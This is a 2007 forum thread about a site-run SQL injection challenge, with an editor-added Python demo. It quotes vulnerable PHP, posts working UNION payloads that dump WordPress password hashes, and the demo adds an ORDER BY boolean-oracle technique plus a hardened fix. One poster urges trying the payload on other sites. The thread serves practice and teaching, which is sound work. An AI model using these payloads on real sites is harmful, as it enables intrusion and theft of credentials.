11:07 am November 9, 2007
GONZO | Guru | posts 569
I got this:
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1]
SELECT count(*) FROM wp_forum_posts WHERE author_id =
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY date DESC LIMIT 10' at line 1]
SELECT * FROM wp_forum_posts WHERE author_id = ORDER BY date DESC LIMIT 10
I'm trying stuff from the vid but it's not working. I feel so close but yet so far away.
The page looks like this:
User profile for
(Send email)
Name:
Alias:
Forum Status: Member
Registered: 12-31-1969
Posts:
Web site:
AIM:
Jabber / Google Talk:
Yahoo IM:
Description:
Recent posts:
Search for all user posts

9:10 pm November 9, 2007
Patchy | Champaign, IL | Admin | posts 1645
Hey Gonzo, look up the difference between GET and POST. Basically, GET variables are in the URL, e.g. http://infinityexists.com/?page_id=5&forumaction=showprofile&user=3
user, forumaction and page_id are all GET variables. POST variables are not visible in the URL. The only way to edit POST variables is to have a program to [b]DATA TAMPER[/b] them, or change them as they leave your browser. (HINT HINT HINT!)
Also, this forum is riddled with errors; just because you found an error doesn't mean you can do SQL injection.
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another." ~ Blaise Pascal, Pensées

1:55 am November 10, 2007
N3th4x | Member | posts 29
I managed to get the same errors and profile as GONZO… seems I was barking up the wrong tree as well. I got your hint, Patchy, not that it has done me much good. =/ I want that damn t-shirt!!! I am buggy cross-eyed from staring at code, etc. for the last 6 hours… off to get a little rest. I expect a full breakdown of this if someone solves it before I do… else I will be going on vacation to the loony bin for a while. =P
P.S. I wouldn't be mad at another hint or 2, Patchy =P

12:59 pm November 10, 2007
marcel.romard | Newbie | posts 2
I think I found the exploit.
The one I found is in the forum search: they do not check the value of forum_sort_by or order.
Just save the page offline and enter your SQL code into the option value for forum_sort_by, and when you do a search, presto.
Here is the source code that causes the problem. As you can see, they build the order_by variable without filtering the POST and use it directly in the SQL statement:
$order_by = "ORDER BY ".$_POST['forum_sort_by']." ".$_POST['order']; // sort column and direction taken straight from the POST body, no allowlist
$wpdb->hide_errors(); // database errors are suppressed, so a broken injected clause just returns nothing
//$out .= "SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by";
$res = $wpdb->get_results("SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by"); // $order_by is interpolated into the statement as-is

1:33 pm November 10, 2007
funkymunky | Member | posts 20
This has completely lost me.
I've been trying all sorts with Tamper Data but to no avail.
Marcel, I don't understand what I have to do??
Cheers

1:38 pm November 10, 2007
N3th4x | Member | posts 29
Were you able to produce the password hashes, Marcel? I have been off on so many different tactics that I have got myself confused. =P Admittedly, I knew next to nothing about SQL before this challenge, so worst case scenario, no t-shirt, but at least I am learning some stuff. =)

3:54 pm November 10, 2007
marcel.romard | Newbie | posts 2
[quote][b]QUOTE[/b] (marcel.romard @ )
I think I found the exploit.
The one I found is in the forum search: they do not check the value of forum_sort_by or order.
Just save the page offline and enter your SQL code into the option value for forum_sort_by, and when you do a search, presto.
Here is the source code that causes the problem. As you can see, they build the order_by variable without filtering the POST and use it directly in the SQL statement:
$order_by = "ORDER BY ".$_POST['forum_sort_by']." ".$_POST['order'];
$wpdb->hide_errors();
//$out .= "SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by";
$res = $wpdb->get_results("SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by");
[/quote]
I was on the right track but I was wrong, sorry.
The correct var to modify is the forum_query_forum select box.
Add the union statement there and it will dump the hashes.
I just added this option to the forum_query_forum and it works locally, but it looks like it might be patched on the site:
<option value="15) UNION (SELECT null,null,null,null,null,user_pass,null FROM wp_users">sdfsdf</option>
I should have remembered that you can't do a union after ORDER BY or LIMIT.
Marcel

4:24 pm November 10, 2007
esc | Member | posts 15
I won the T-shirt, yupi.
I will email you my address.
marcel.romard, I will try to look up your error but I don't have time now.
If it is working locally I think it will work online too. Try it on some site and see if it is working.
Patchy, I don't know your email; I will msg you on AIM.

4:43 pm November 10, 2007
Patchy | Champaign, IL | Admin | posts 1645
marcel.romard and esc both won the SQL injection challenge! Marcel, you found the correct SQL injection flaw; however, the challenge was designed for you to enter [i]15) union select null,null,null,null,null,user_pass,null from wp_users#[/i]. If you had put that in, the challenge would have told you that you won and recorded your username. Oh well, in real life your union statement would work also. If both of you could email your address to patchy@infinityexists.com we will send you guys a t-shirt. CONGRATS!!

4:58 pm November 10, 2007
Patchy | Champaign, IL | Admin | posts 1645
This challenge will be left open for other users to practice SQL injection. Now, should I upload a Vblog on how to complete this challenge, or do you guys want to figure it out on your own? (But marcel.romard and I already pretty much gave the whole challenge away.)

5:14 pm November 10, 2007
N3th4x | Member | posts 29
Congrats marcel.romard & esc!!! Great contest, Patchy. Admittedly way over my head currently. =P Looking forward to the next challenge!!! (Hint, hint!!!)

3:44 am November 11, 2007
funkymunky | Member | posts 20
Well done, guys.
I was looking in completely the wrong direction.
I was trying to edit cookies and all sorts, lol.

11:22 am November 11, 2007
ToolBust | Newbie | posts 2
I do exactly as you do in the video and it doesn't work… I've tried at other forums but unsuccessfully. Why is that?? Can you help me?

2:02 am November 13, 2007
127.0.0.1 | Member | posts 17
If we find any other flaws that allow us to extract passwords, should we post them here?
And now that all the skiddies have gained some understanding of SQL injection…
http://imgs.xkcd.com/comics/exploits_of_a_mom.png

1:20 pm November 13, 2007
N3th4x | Member | posts 29

2:51 pm November 13, 2007
funkymunky | Member | posts 20
hahaha
127
Patchy, when will we have a video about this?
I understand your previous video about SQL injection, and have carried it out successfully; however, what should I have been looking for in the source code telling me the search function was vulnerable??

2:18 am November 14, 2007
127.0.0.1 | Member | posts 17
I haven't watched the video, but I think the idea is to see where you can send information to the server that it does not check before passing it along to the database.
e.g. marcel found this:
$order_by = "ORDER BY ".$_POST['forum_sort_by']." ".$_POST['order'];
$wpdb->hide_errors();
//$out .= "SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by";
$res = $wpdb->get_results("SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by");
Note that $query is passed to the database. Marcel's sploit was:
15) UNION (SELECT null,null,null,null,null,user_pass,null FROM wp_users
(the closing bracket after the '15' is to close the "like" condition)
Changing what is sent to the query means that you can do things like unions…
So the actual querying function is vulnerable, but what you are looking to mess with is the variable that is passed to it.
I hope that made sense…
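Added example for the search-form injection discussed in marcel.romard's two posts, Patchy's winning payload and 127.0.0.1's explanation above. This is editor-supplied Python, not code from the infinityexists forum or its WordPress forum plugin. It rebuilds, over an in-memory SQLite database with constructed rows, the query the quoted PHP assembles from the decoded POST body (the same fields Tamper Data, or a saved and edited copy of the form, lets you change), then shows marcel's first vector (a CASE expression in forum_sort_by that leaks one true/false answer per search through the row order, since no UNION is possible after ORDER BY), the forum_query_forum UNION that dumps wp_users.user_pass, and a hardened builder that stops both. Everything not on the page is an assumption: the seven-column layout of wp_forum_posts, $cond being rendered as " AND (forum_id = <value>)", the sample rows and hashes, and SQLite's "-- " comment standing in for the "#" MySQL accepts in Patchy's payload.

```python
"""Added example (not code from the infinityexists forum or its WordPress plugin).

Rebuilds the forum search query from the POST fields the thread names and shows
(1) ORDER BY inference via forum_sort_by, (2) the UNION dump via forum_query_forum,
(3) a hardened builder. Column layout, $cond shape, rows and hashes are assumed.
"""
import sqlite3

# Assumed column layout; the seven NULL placeholders in the payload match it.
POST_COLUMNS = ("id", "forum_id", "author_id", "date", "subject", "text", "status")
SORT_ALLOWLIST = {"date", "subject", "author_id"}
ORDER_ALLOWLIST = {"ASC", "DESC"}


def make_db():
    """In-memory stand-in for the wp_ tables, populated with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_forum_posts(id INTEGER, forum_id INTEGER, author_id INTEGER,
                                    date TEXT, subject TEXT, text TEXT, status INTEGER);
        CREATE TABLE wp_users(ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_forum_posts VALUES
            (1, 15, 3, '2007-11-09', 'welcome', 'the sql injection challenge', 1),
            (2, 15, 4, '2007-11-10', 'reply',   'found the sql flaw',          1),
            (3, 16, 3, '2007-11-10', 'other',   'unrelated sql talk',          1);
        INSERT INTO wp_users VALUES
            (1, 'patchy', '$P$Bconstructed_hash_for_patchy'),
            (2, 'gonzo',  '$P$Bconstructed_hash_for_gonzo');
    """)
    return db


def vulnerable_search(db, post):
    """Mirror of the quoted PHP: every field of the decoded POST body is pasted
    into the SQL string. $cond is assumed to render as ' AND (forum_id = <v>)'."""
    cond = " AND (forum_id = " + post["forum_query_forum"] + ")"
    order_by = "ORDER BY " + post["forum_sort_by"] + " " + post["order"]
    sql = ("SELECT * FROM wp_forum_posts WHERE text LIKE '%"
           + post["forum_query"] + "%'" + cond + " " + order_by)
    return sql, db.execute(sql).fetchall()


def union_dump(db):
    """Patchy's intended payload with MySQL's '#' swapped for SQLite's '-- '.
    The ')' closes the forum_id condition; the comment swallows the trailing
    ') ORDER BY ...' so the UNION is the last clause of the statement."""
    payload = ("15) UNION SELECT null,null,null,null,null,user_pass,null "
               "FROM wp_users -- ")
    post = {"forum_query": "sql", "forum_query_forum": payload,
            "forum_sort_by": "date", "order": "DESC"}
    _, rows = vulnerable_search(db, post)
    # user_pass lands in the 6th column (the 'text' slot) of the unioned rows.
    return sorted(r[5] for r in rows if r[5] is not None and r[5].startswith("$P$"))


def order_by_oracle(db, condition_sql):
    """marcel's first vector: forum_sort_by is unfiltered, so a CASE picks the
    sort column. Both forum-15 rows match 'sql'; date DESC puts post 2 first,
    subject DESC puts post 1 first ('welcome' > 'reply'), so the first row's id
    answers the injected condition one bit per search."""
    post = {"forum_query": "sql", "forum_query_forum": "15",
            "forum_sort_by": "(CASE WHEN (" + condition_sql + ") THEN date ELSE subject END)",
            "order": "DESC"}
    _, rows = vulnerable_search(db, post)
    return rows[0][0] == 2


def safe_search(db, post):
    """Hardened builder: the forum id becomes a bound integer parameter, and the
    sort column and direction must come from fixed allowlists (identifiers
    cannot be bound as parameters, hence the allowlist rather than a '?')."""
    forum_id = int(post["forum_query_forum"])          # ValueError on '15) UNION ...'
    sort_by = post["forum_sort_by"]
    order = post["order"].upper()
    if sort_by not in SORT_ALLOWLIST or order not in ORDER_ALLOWLIST:
        raise ValueError("sort field or direction not allowed")
    sql = ("SELECT * FROM wp_forum_posts WHERE text LIKE ? AND forum_id = ? "
           "ORDER BY " + sort_by + " " + order)
    return db.execute(sql, ("%" + post["forum_query"] + "%", forum_id)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("dumped hashes:", union_dump(db))
    cond = "(SELECT substr(user_pass, 1, 3) FROM wp_users WHERE user_login = 'patchy') = '$P$'"
    print("patchy's hash starts with $P$:", order_by_oracle(db, cond))
```

The forum_sort_by vector is the one marcel first reported and then discounted: it cannot carry a UNION, but an ORDER BY expression still evaluates attacker-chosen SQL, so a CASE over a subquery turns the result order into a yes/no oracle. The hardened builder shows why the fix is two-part: a bound parameter for the value, and an allowlist for the identifiers, which parameter binding cannot protect.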

4:38 am November 14, 2007
funkymunky | Member | posts 20
Oh wow.
I'm doing SQL at uni at the minute so it kind of makes sense. But at the same time it doesn't :s lol

4:42 am November 14, 2007
127.0.0.1 | Member | posts 17
Say what you don't understand, and I'm sure that if I can't articulate it, someone will be able to…
Good luck with learning it; you'll see it's really basic after a while.

4:46 pm November 19, 2007
esc | Member | posts 15
And the prize is on the way, right?